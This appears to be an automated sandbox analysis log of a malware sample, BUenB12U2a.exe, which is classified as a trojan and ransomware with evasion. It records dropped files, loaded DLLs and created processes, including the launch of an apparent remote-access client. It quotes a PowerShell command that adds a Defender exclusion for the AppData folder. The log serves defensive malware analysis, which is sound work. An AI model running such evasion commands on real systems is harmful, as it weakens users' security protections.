                                Source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1792021334.0000020E479A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2007984529.0000020E47096000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2019629636.0000020E478FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2008110691.0000020E470A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2047569142.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E4791C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2046901104.00007FFE1030E000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs BUenB12U2a.exe
                                Source: classification engineClassification label: mal92.rans.troj.evad.winEXE@20/97@3/5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCD47E0 AdjustTokenPrivileges,CloseHandle,6_2_6CCD47E0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCD4750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_6CCD4750
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDD3BB _getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_memset,GetDiskFreeSpaceA,GetLastError,_errno,6_2_6CBDD3BB
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD46C40 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,6_2_6CD46C40
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD02FC0 FindResourceExA,LoadResource,LockResource,CreateDialogIndirectParamA,CreateDialogIndirectParamA,CreateDialogParamA,GetLastError,wsprintfA,6_2_6CD02FC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extractedJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962Jump to behavior
                                Source: BUenB12U2a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeFile read: C:\Users\user\AppData\Roaming\extracted\client32.iniJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: BUenB12U2a.exeVirustotal: Detection: 38%
                                Source: BUenB12U2a.exeReversingLabs: Detection: 34%
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile read: C:\Users\user\Desktop\BUenB12U2a.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe C:\Users\user\AppData\Roaming\extracted\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe "C:\Users\user\AppData\Roaming\extracted\client32.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                                Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\extracted\client32.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe C:\Users\user\AppData\Roaming\extracted\client32.exeJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libffi-8.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libcrypto-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libssl-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: libcrypto-3.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: pdh.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{75048700-EF1F-11D0-9888-006097DEACF9}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile written: C:\Users\user\AppData\Roaming\extracted\client32.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: BUenB12U2a.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: BUenB12U2a.exeStatic file information: File size 33884861 > 1048576
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeFile opened: C:\Users\user\AppData\Roaming\extracted\MSVCR100.dllJump to behavior
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: BUenB12U2a.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: BUenB12U2a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: BUenB12U2a.exe, 00000001.00000002.2046118971.00007FFDFB858000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp
